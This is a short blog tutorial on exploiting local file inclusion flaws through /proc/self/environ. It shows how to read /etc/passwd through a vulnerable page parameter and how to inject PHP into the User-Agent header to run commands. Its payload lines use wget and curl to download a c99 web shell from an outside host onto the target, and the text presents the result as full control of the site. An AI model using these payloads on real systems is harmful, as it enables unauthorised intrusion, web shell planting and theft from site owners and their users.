EXPLOITING LFI VULNERABILITIES via /PROC/SELF/ENVIRON
credits-kaotic
I
previously covered how to exploit LFI vulnerabilities with FIMAP but
have received some questions from folks due to FIMAP not always picking
the injection points up. Automated tools are nice but if you don’t know
how to do it manually then you can miss a lot of possible
vulnerabilities and opportunities you can leverage to exploit your
target (plus its good to know what goes on behind the scenes). Today I
am going to show you how to perform LFI exploitation through the
/proc/self/environ method. Here goes…
OK,
so first we walk through our site and we notice a link which seems to
be referencing another document on the server. This is a good place to
start investigating potential LFI vulnerabilities.
We click on "Contact Us">>leads us to...
NOTE: page= appears to reference to another document on server (in this case contacts.php)
Let us see what happens if we replace the standard link with some arbitrary data:
Now let us try to reference a real document which we know to be on all unix machines, /etc/passwd:
Voila!
We can read the /etc/passwd file through LFI! This is good, but now we
need to check to see if /proc/self/environ is accessible. If it is we
can leverage it to get a shell on the target site. If it is not then we
will need to further investigate which files we can access and then see
if we can inject into any of them. I will only be focusing on the
/proc/self/environ method for now, but may write another follow up in
future to cover some of the other methods which can be used for LFI
takeover. OK, so now we check for existance of /proc/self/environ:
NOTE the “DOCUMENT_ROOT=[VALUE]” on the returned page.
This is the key indicator that we have access to the /proc/self/environ
which we can now leverage to put a shell on the target site. We will
accomplish this by injecting our PHP code into the User Agent field
when we request this file again. Due to the way this is processed it
will inject our code and then we can use to further escalate priveleges.
We will now inject this code into our page request for
/proc/self/environ and refresh the page.
Inject PHP code in UA field, like one of these:
We can now read the results of any of the commands we pass through in the User-Agent field, it will look similar to this:
ID: <?system('id');?>
UNAME: <?system('uname -a');?>
UPLOAD SHELL WITH WGET: <?system('wget http://www.sh3ll.org/c99.txt -O shell.php');?>
OR
UPLOAD SHELL WITH CURL: <?system('curl -o shell.php http://www.sh3ll.org/c99.txt');?>
NOTE:
to inject the code into the User-Agent field you will need a add-on for
your browser such as Live HTTP Headers, Tamper Data, or Burp Suite.
Once
our code is injected we simply navigate to the webshell we just
uploaded, should be located in site.com/shell.php unless you instructed
it to go elsewhere when you used your WGET or CURL command for shell
download. If your lucky when you go to your shell you will be greeted
with something similar to this:
Now
that you have a shell on the site you are fairly free to do what you
want. I hope you have enjoyed another brief tutorial on LFI. I will try
to work on follow up articles covering Log Injection methd and one or
two more methods that can be used when the conditions are right. Until
next time, enjoy!
0 comments:
Post a Comment